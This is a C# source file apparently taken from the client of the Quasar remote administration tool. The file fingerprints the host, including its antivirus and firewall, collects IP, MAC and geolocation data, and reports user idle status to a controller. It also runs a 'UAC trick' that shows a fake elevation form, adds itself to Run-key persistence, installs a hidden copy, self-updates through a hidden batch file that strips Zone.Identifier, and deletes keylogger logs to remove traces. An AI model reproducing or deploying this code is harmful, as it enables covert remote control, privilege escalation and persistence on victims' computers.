mirror of https://github.com/quasar/Quasar.git
649 lines
24 KiB
C#
649 lines
24 KiB
C#
using System;
|
|
using System.Diagnostics;
|
|
using System.IO;
|
|
using System.Management;
|
|
using System.Net.NetworkInformation;
|
|
using System.Net.Sockets;
|
|
using System.Runtime.InteropServices;
|
|
using System.Security.Principal;
|
|
using System.Threading;
|
|
using System.Windows.Forms;
|
|
using Microsoft.Win32;
|
|
using xClient.Config;
|
|
using xClient.Core.Information;
|
|
using xClient.Core.Encryption;
|
|
using xClient.Core.Extensions;
|
|
|
|
namespace xClient.Core
|
|
{
|
|
public static class SystemCore
|
|
{
|
|
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
|
|
[return: MarshalAs(UnmanagedType.Bool)]
|
|
private static extern bool DeleteFile(string name);
|
|
|
|
[DllImport("user32.dll")]
|
|
private static extern bool GetLastInputInfo(ref LASTINPUTINFO plii);
|
|
|
|
[StructLayout(LayoutKind.Sequential)]
|
|
private struct LASTINPUTINFO
|
|
{
|
|
public static readonly int SizeOf = Marshal.SizeOf(typeof (LASTINPUTINFO));
|
|
|
|
[MarshalAs(UnmanagedType.U4)] public UInt32 cbSize;
|
|
[MarshalAs(UnmanagedType.U4)] public UInt32 dwTime;
|
|
}
|
|
|
|
public static readonly string[] ImageList =
|
|
{
|
|
"ad.png", "ae.png", "af.png", "ag.png", "ai.png", "al.png",
|
|
"am.png", "an.png", "ao.png", "ar.png", "as.png", "at.png", "au.png", "aw.png", "ax.png", "az.png", "ba.png",
|
|
"bb.png", "bd.png", "be.png", "bf.png", "bg.png", "bh.png", "bi.png", "bj.png", "bm.png", "bn.png", "bo.png",
|
|
"br.png", "bs.png", "bt.png", "bv.png", "bw.png", "by.png", "bz.png", "ca.png", "catalonia.png", "cc.png",
|
|
"cd.png", "cf.png", "cg.png", "ch.png", "ci.png", "ck.png", "cl.png", "cm.png", "cn.png", "co.png", "cr.png",
|
|
"cs.png", "cu.png", "cv.png", "cx.png", "cy.png", "cz.png", "de.png", "dj.png", "dk.png", "dm.png", "do.png",
|
|
"dz.png", "ec.png", "ee.png", "eg.png", "eh.png", "england.png", "er.png", "es.png", "et.png",
|
|
"europeanunion.png", "fam.png", "fi.png", "fj.png", "fk.png", "fm.png", "fo.png", "fr.png", "ga.png",
|
|
"gb.png", "gd.png", "ge.png", "gf.png", "gh.png", "gi.png", "gl.png", "gm.png", "gn.png", "gp.png", "gq.png",
|
|
"gr.png", "gs.png", "gt.png", "gu.png", "gw.png", "gy.png", "hk.png", "hm.png", "hn.png", "hr.png", "ht.png",
|
|
"hu.png", "id.png", "ie.png", "il.png", "in.png", "io.png", "iq.png", "ir.png", "is.png", "it.png", "jm.png",
|
|
"jo.png", "jp.png", "ke.png", "kg.png", "kh.png", "ki.png", "km.png", "kn.png", "kp.png", "kr.png", "kw.png",
|
|
"ky.png", "kz.png", "la.png", "lb.png", "lc.png", "li.png", "lk.png", "lr.png", "ls.png", "lt.png", "lu.png",
|
|
"lv.png", "ly.png", "ma.png", "mc.png", "md.png", "me.png", "mg.png", "mh.png", "mk.png", "ml.png", "mm.png",
|
|
"mn.png", "mo.png", "mp.png", "mq.png", "mr.png", "ms.png", "mt.png", "mu.png", "mv.png", "mw.png", "mx.png",
|
|
"my.png", "mz.png", "na.png", "nc.png", "ne.png", "nf.png", "ng.png", "ni.png", "nl.png", "no.png", "np.png",
|
|
"nr.png", "nu.png", "nz.png", "om.png", "pa.png", "pe.png", "pf.png", "pg.png", "ph.png", "pk.png", "pl.png",
|
|
"pm.png", "pn.png", "pr.png", "ps.png", "pt.png", "pw.png", "py.png", "qa.png", "re.png", "ro.png", "rs.png",
|
|
"ru.png", "rw.png", "sa.png", "sb.png", "sc.png", "scotland.png", "sd.png", "se.png", "sg.png", "sh.png",
|
|
"si.png", "sj.png", "sk.png", "sl.png", "sm.png", "sn.png", "so.png", "sr.png", "st.png", "sv.png", "sy.png",
|
|
"sz.png", "tc.png", "td.png", "tf.png", "tg.png", "th.png", "tj.png", "tk.png", "tl.png", "tm.png", "tn.png",
|
|
"to.png", "tr.png", "tt.png", "tv.png", "tw.png", "tz.png", "ua.png", "ug.png", "um.png", "us.png", "uy.png",
|
|
"uz.png", "va.png", "vc.png", "ve.png", "vg.png", "vi.png", "vn.png", "vu.png", "wales.png", "wf.png",
|
|
"ws.png", "ye.png", "yt.png", "za.png", "zm.png", "zw.png"
|
|
};
|
|
|
|
public static bool Disconnect = false; // when Disconnect is true, stop all running threads
|
|
public static string OperatingSystem = string.Empty;
|
|
public static string MyPath = string.Empty;
|
|
public static string InstallPath = string.Empty;
|
|
public static string AccountType = string.Empty;
|
|
public static string WanIp = string.Empty;
|
|
public static string Country = string.Empty;
|
|
public static string CountryCode = string.Empty;
|
|
public static string Region = string.Empty;
|
|
public static string City = string.Empty;
|
|
public static string LastStatus = "Active";
|
|
public static int ImageIndex;
|
|
|
|
public static string GetOperatingSystem()
|
|
{
|
|
return string.Format("{0} {1} Bit", OSInfo.Name, OSInfo.Bits);
|
|
}
|
|
|
|
public static string GetAccountType()
|
|
{
|
|
using (WindowsIdentity identity = WindowsIdentity.GetCurrent())
|
|
{
|
|
if (identity != null)
|
|
{
|
|
WindowsPrincipal principal = new WindowsPrincipal(identity);
|
|
|
|
if (principal.IsInRole(WindowsBuiltInRole.Administrator))
|
|
return "Admin";
|
|
if (principal.IsInRole(WindowsBuiltInRole.User))
|
|
return "User";
|
|
if (principal.IsInRole(WindowsBuiltInRole.Guest))
|
|
return "Guest";
|
|
}
|
|
}
|
|
|
|
return "Unknown";
|
|
}
|
|
|
|
public static string GetId()
|
|
{
|
|
return SHA256.ComputeHash(GetMacAddress());
|
|
}
|
|
|
|
public static string GetCpu()
|
|
{
|
|
try
|
|
{
|
|
string cpuName = string.Empty;
|
|
string query = "SELECT * FROM Win32_Processor";
|
|
|
|
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher("root\\CIMV2", query))
|
|
{
|
|
foreach (ManagementObject mObject in searcher.Get())
|
|
{
|
|
cpuName = mObject["Name"].ToString();
|
|
|
|
// If a cpu name was found, return the name. Otherwise, we would continue iterating.
|
|
if (!string.IsNullOrEmpty(cpuName))
|
|
{
|
|
return cpuName;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
|
|
return "Unknown";
|
|
}
|
|
|
|
public static int GetRam()
|
|
{
|
|
try
|
|
{
|
|
int installedRAM = 0;
|
|
string query = "Select * From Win32_ComputerSystem";
|
|
|
|
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(query))
|
|
{
|
|
foreach (ManagementObject mObject in searcher.Get())
|
|
{
|
|
double bytes = (Convert.ToDouble(mObject["TotalPhysicalMemory"]));
|
|
installedRAM = (int) (bytes/1048576);
|
|
}
|
|
}
|
|
|
|
return installedRAM;
|
|
}
|
|
catch
|
|
{
|
|
return -1;
|
|
}
|
|
}
|
|
|
|
public static string GetGpu()
|
|
{
|
|
try
|
|
{
|
|
string gpuName = string.Empty;
|
|
string query = "SELECT * FROM Win32_DisplayConfiguration";
|
|
|
|
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(query))
|
|
{
|
|
foreach (ManagementObject mObject in searcher.Get())
|
|
{
|
|
gpuName = mObject["Description"].ToString();
|
|
}
|
|
}
|
|
|
|
return (!string.IsNullOrEmpty(gpuName)) ? gpuName : "N/A";
|
|
}
|
|
catch
|
|
{
|
|
return "Unknown";
|
|
}
|
|
}
|
|
|
|
public static string GetAntivirus()
|
|
{
|
|
try
|
|
{
|
|
string antivirusName = string.Empty;
|
|
string scope = (Helper.Helper.IsWindowsXP()) ? "root\\SecurityCenter" : "root\\SecurityCenter2";
|
|
string query = "SELECT * FROM AntivirusProduct";
|
|
|
|
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(scope, query))
|
|
{
|
|
foreach (ManagementObject mObject in searcher.Get())
|
|
{
|
|
antivirusName = mObject["displayName"].ToString();
|
|
}
|
|
}
|
|
|
|
return (!string.IsNullOrEmpty(antivirusName)) ? antivirusName : "N/A";
|
|
}
|
|
catch
|
|
{
|
|
return "Unknown";
|
|
}
|
|
}
|
|
|
|
public static string GetFirewall()
|
|
{
|
|
try
|
|
{
|
|
string firewallName = string.Empty;
|
|
string scope = (Helper.Helper.IsWindowsXP()) ? "root\\SecurityCenter" : "root\\SecurityCenter2";
|
|
string query = "SELECT * FROM FirewallProduct";
|
|
|
|
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(scope, query))
|
|
{
|
|
foreach (ManagementObject mObject in searcher.Get())
|
|
{
|
|
firewallName = mObject["displayName"].ToString();
|
|
}
|
|
}
|
|
|
|
return (!string.IsNullOrEmpty(firewallName)) ? firewallName : "N/A";
|
|
}
|
|
catch
|
|
{
|
|
return "Unknown";
|
|
}
|
|
}
|
|
|
|
public static string GetUptime()
|
|
{
|
|
int uptimeSec = Environment.TickCount/1000;
|
|
TimeSpan result = TimeSpan.FromSeconds(uptimeSec);
|
|
return string.Format("{0}d : {1}h : {2}m : {3}s", result.Days, result.Hours, result.Minutes, result.Seconds);
|
|
}
|
|
|
|
public static string GetUsername()
|
|
{
|
|
return Environment.UserName;
|
|
}
|
|
|
|
public static string GetPcName()
|
|
{
|
|
return Environment.MachineName;
|
|
}
|
|
|
|
public static string GetLanIp()
|
|
{
|
|
foreach (NetworkInterface ni in NetworkInterface.GetAllNetworkInterfaces())
|
|
{
|
|
if (ni.NetworkInterfaceType == NetworkInterfaceType.Wireless80211 ||
|
|
ni.NetworkInterfaceType == NetworkInterfaceType.Ethernet &&
|
|
ni.OperationalStatus == OperationalStatus.Up)
|
|
{
|
|
foreach (UnicastIPAddressInformation ip in ni.GetIPProperties().UnicastAddresses)
|
|
{
|
|
if (ip.Address.AddressFamily != AddressFamily.InterNetwork ||
|
|
ip.AddressPreferredLifetime == UInt32.MaxValue) // exclude virtual network addresses
|
|
continue;
|
|
|
|
return ip.Address.ToString();
|
|
}
|
|
}
|
|
}
|
|
|
|
return "-";
|
|
}
|
|
|
|
public static string GetMacAddress()
|
|
{
|
|
foreach (NetworkInterface ni in NetworkInterface.GetAllNetworkInterfaces())
|
|
{
|
|
if (ni.NetworkInterfaceType == NetworkInterfaceType.Wireless80211 ||
|
|
ni.NetworkInterfaceType == NetworkInterfaceType.Ethernet &&
|
|
ni.OperationalStatus == OperationalStatus.Up)
|
|
{
|
|
bool foundCorrect = false;
|
|
foreach (UnicastIPAddressInformation ip in ni.GetIPProperties().UnicastAddresses)
|
|
{
|
|
if (ip.Address.AddressFamily != AddressFamily.InterNetwork ||
|
|
ip.AddressPreferredLifetime == UInt32.MaxValue) // exclude virtual network addresses
|
|
continue;
|
|
|
|
foundCorrect = (ip.Address.ToString() == GetLanIp());
|
|
}
|
|
|
|
if (foundCorrect)
|
|
return Helper.Helper.FormatMacAddress(ni.GetPhysicalAddress().ToString());
|
|
}
|
|
}
|
|
|
|
return "-";
|
|
}
|
|
|
|
public static void InitializeGeoIp()
|
|
{
|
|
GeoIP gIp = new GeoIP();
|
|
|
|
Country = gIp.Country;
|
|
CountryCode = gIp.CountryCode;
|
|
Region = gIp.Region;
|
|
City = gIp.City;
|
|
WanIp = gIp.WanIp;
|
|
|
|
if (CountryCode == "-" || Country == "Unknown")
|
|
{
|
|
ImageIndex = 247; // question icon
|
|
return;
|
|
}
|
|
|
|
for (int i = 0; i < ImageList.Length; i++)
|
|
{
|
|
if (ImageList[i].Contains(CountryCode.ToLower()))
|
|
{
|
|
ImageIndex = i;
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
|
|
public static bool TryUacTrick()
|
|
{
|
|
if (AccountType == "Admin")
|
|
return false;
|
|
|
|
if (MyPath == InstallPath)
|
|
return false;
|
|
|
|
Thread.Sleep(3000);
|
|
|
|
Application.Run(new Elevation.FrmElevation());
|
|
|
|
Thread.Sleep(200);
|
|
|
|
Application.Exit();
|
|
|
|
ProcessStartInfo processStartInfo = new ProcessStartInfo
|
|
{
|
|
FileName = "cmd.exe",
|
|
Verb = "runas",
|
|
Arguments = "/k START \"\" \"" + MyPath + "\" -CHECK & PING -n 2 127.0.0.1 & EXIT",
|
|
WindowStyle = ProcessWindowStyle.Hidden,
|
|
UseShellExecute = true
|
|
};
|
|
try
|
|
{
|
|
Process.Start(processStartInfo);
|
|
return true;
|
|
}
|
|
catch
|
|
{
|
|
return false;
|
|
}
|
|
}
|
|
|
|
public static bool CreateMutex(ref Mutex mutex)
|
|
{
|
|
bool createdNew;
|
|
mutex = new Mutex(false, Settings.MUTEX, out createdNew);
|
|
return createdNew;
|
|
}
|
|
|
|
public static void UserIdleThread()
|
|
{
|
|
while (!Disconnect)
|
|
{
|
|
Thread.Sleep(5000);
|
|
if (IsUserIdle())
|
|
{
|
|
if (LastStatus != "Idle")
|
|
{
|
|
LastStatus = "Idle";
|
|
new Packets.ClientPackets.UserStatus(LastStatus).Execute(Program.ConnectClient);
|
|
}
|
|
}
|
|
else
|
|
{
|
|
if (LastStatus != "Active")
|
|
{
|
|
LastStatus = "Active";
|
|
new Packets.ClientPackets.UserStatus(LastStatus).Execute(Program.ConnectClient);
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
private static bool IsUserIdle()
|
|
{
|
|
uint idleTime = 0;
|
|
LASTINPUTINFO lastInputInfo = new LASTINPUTINFO();
|
|
lastInputInfo.cbSize = (uint) Marshal.SizeOf(lastInputInfo);
|
|
lastInputInfo.dwTime = 0;
|
|
|
|
uint envTicks = (uint) Environment.TickCount;
|
|
|
|
if (GetLastInputInfo(ref lastInputInfo))
|
|
{
|
|
uint lastInputTick = lastInputInfo.dwTime;
|
|
idleTime = envTicks - lastInputTick;
|
|
}
|
|
|
|
idleTime = ((idleTime > 0) ? (idleTime/1000) : 0);
|
|
|
|
return (idleTime > 600); // idle for 10 minutes
|
|
}
|
|
|
|
public static void AddToStartup()
|
|
{
|
|
if (Settings.STARTUP)
|
|
{
|
|
if (AccountType == "Admin")
|
|
{
|
|
try // try LocalMachine
|
|
{
|
|
using (
|
|
RegistryKey key =
|
|
Registry.LocalMachine.OpenWritableSubKeySafe("Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
|
|
{
|
|
if (key == null) throw new Exception();
|
|
key.SetValue(Settings.STARTUPKEY, InstallPath);
|
|
key.Close();
|
|
}
|
|
}
|
|
catch // if fails use CurrentUser
|
|
{
|
|
try
|
|
{
|
|
using (
|
|
RegistryKey key =
|
|
Registry.CurrentUser.OpenWritableSubKeySafe(
|
|
"Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
|
|
{
|
|
if (key == null) throw new Exception();
|
|
key.SetValue(Settings.STARTUPKEY, InstallPath);
|
|
key.Close();
|
|
}
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
}
|
|
}
|
|
else
|
|
{
|
|
try
|
|
{
|
|
using (
|
|
RegistryKey key =
|
|
Registry.CurrentUser.OpenWritableSubKeySafe("Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
|
|
{
|
|
if (key == null) throw new Exception();
|
|
key.SetValue(Settings.STARTUPKEY, InstallPath);
|
|
key.Close();
|
|
}
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
public static void Install(bool addToStartup = true)
|
|
{
|
|
bool isKilled = false;
|
|
|
|
// create target dir
|
|
if (!Directory.Exists(Path.Combine(Settings.DIR, Settings.SUBFOLDER)))
|
|
Directory.CreateDirectory(Path.Combine(Settings.DIR, Settings.SUBFOLDER));
|
|
|
|
// delete existing file
|
|
if (File.Exists(InstallPath))
|
|
{
|
|
try
|
|
{
|
|
File.Delete(InstallPath);
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
if (ex is IOException || ex is UnauthorizedAccessException)
|
|
{
|
|
// kill old process if new mutex
|
|
Process[] foundProcesses =
|
|
Process.GetProcessesByName(Path.GetFileNameWithoutExtension(InstallPath));
|
|
int myPid = Process.GetCurrentProcess().Id;
|
|
foreach (var prc in foundProcesses)
|
|
{
|
|
if (prc.Id == myPid) continue;
|
|
prc.Kill();
|
|
isKilled = true;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
if (isKilled) Thread.Sleep(5000);
|
|
|
|
//copy client to target dir
|
|
File.Copy(MyPath, InstallPath, true);
|
|
|
|
if (addToStartup)
|
|
AddToStartup();
|
|
|
|
if (Settings.HIDEFILE)
|
|
{
|
|
try
|
|
{
|
|
File.SetAttributes(InstallPath, FileAttributes.Hidden);
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
}
|
|
|
|
//start file
|
|
var startInfo = new ProcessStartInfo
|
|
{
|
|
WindowStyle = ProcessWindowStyle.Hidden,
|
|
CreateNoWindow = true,
|
|
UseShellExecute = true,
|
|
FileName = InstallPath
|
|
};
|
|
Process.Start(startInfo);
|
|
|
|
Disconnect = true;
|
|
}
|
|
|
|
public static void UpdateClient(Client c, string newFile)
|
|
{
|
|
try
|
|
{
|
|
DeleteFile(newFile + ":Zone.Identifier");
|
|
|
|
var bytes = File.ReadAllBytes(newFile);
|
|
if (bytes[0] != 'M' && bytes[1] != 'Z')
|
|
throw new Exception("no pe file");
|
|
|
|
string filename = Path.Combine(
|
|
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
|
|
Helper.Helper.GetRandomFilename(12, ".bat"));
|
|
|
|
string uninstallBatch = (Settings.INSTALL && Settings.HIDEFILE)
|
|
? "@echo off" + "\n" +
|
|
"echo DONT CLOSE THIS WINDOW!" + "\n" +
|
|
"ping -n 20 localhost > nul" + "\n" +
|
|
"del /A:H " + "\"" + MyPath + "\"" + "\n" +
|
|
"move " + "\"" + newFile + "\"" + " " + "\"" + MyPath + "\"" + "\n" +
|
|
"start \"\" " + "\"" + MyPath + "\"" + "\n" +
|
|
"del " + "\"" + filename + "\""
|
|
: "@echo off" + "\n" +
|
|
"echo DONT CLOSE THIS WINDOW!" + "\n" +
|
|
"ping -n 20 localhost > nul" + "\n" +
|
|
"del " + "\"" + MyPath + "\"" + "\n" +
|
|
"move " + "\"" + newFile + "\"" + " " + "\"" + MyPath + "\"" + "\n" +
|
|
"start \"\" " + "\"" + MyPath + "\"" + "\n" +
|
|
"del " + "\"" + filename + "\""
|
|
;
|
|
|
|
File.WriteAllText(filename, uninstallBatch);
|
|
ProcessStartInfo startInfo = new ProcessStartInfo
|
|
{
|
|
WindowStyle = ProcessWindowStyle.Hidden,
|
|
CreateNoWindow = true,
|
|
UseShellExecute = true,
|
|
FileName = filename
|
|
};
|
|
Process.Start(startInfo);
|
|
|
|
Disconnect = true;
|
|
c.Disconnect();
|
|
RemoveTraces();
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
DeleteFile(newFile);
|
|
new Packets.ClientPackets.Status(string.Format("Update failed: {0}", ex.Message)).Execute(c);
|
|
}
|
|
}
|
|
|
|
public static void RemoveTraces()
|
|
{
|
|
if (Settings.STARTUP)
|
|
{
|
|
if (AccountType == "Admin")
|
|
{
|
|
try
|
|
{
|
|
using (
|
|
RegistryKey key =
|
|
Registry.LocalMachine.OpenWritableSubKeySafe("Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
|
|
{
|
|
if (key != null)
|
|
{
|
|
key.DeleteValue(Settings.STARTUPKEY, true);
|
|
key.Close();
|
|
}
|
|
}
|
|
}
|
|
catch
|
|
{
|
|
// try deleting from Registry.CurrentUser
|
|
using (
|
|
RegistryKey key =
|
|
Registry.CurrentUser.OpenWritableSubKeySafe("Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
|
|
{
|
|
if (key != null)
|
|
{
|
|
key.DeleteValue(Settings.STARTUPKEY, true);
|
|
key.Close();
|
|
}
|
|
}
|
|
}
|
|
}
|
|
else
|
|
{
|
|
try
|
|
{
|
|
using (
|
|
RegistryKey key =
|
|
Registry.CurrentUser.OpenWritableSubKeySafe("Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
|
|
{
|
|
if (key != null)
|
|
{
|
|
key.DeleteValue(Settings.STARTUPKEY, true);
|
|
key.Close();
|
|
}
|
|
}
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
}
|
|
}
|
|
|
|
string logsDirectory = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Logs\\";
|
|
if (Directory.Exists(logsDirectory)) // try to delete Logs from Keylogger
|
|
{
|
|
try
|
|
{
|
|
Directory.Delete(logsDirectory, true);
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
}
|
|
}
|
|
}
|
|
} |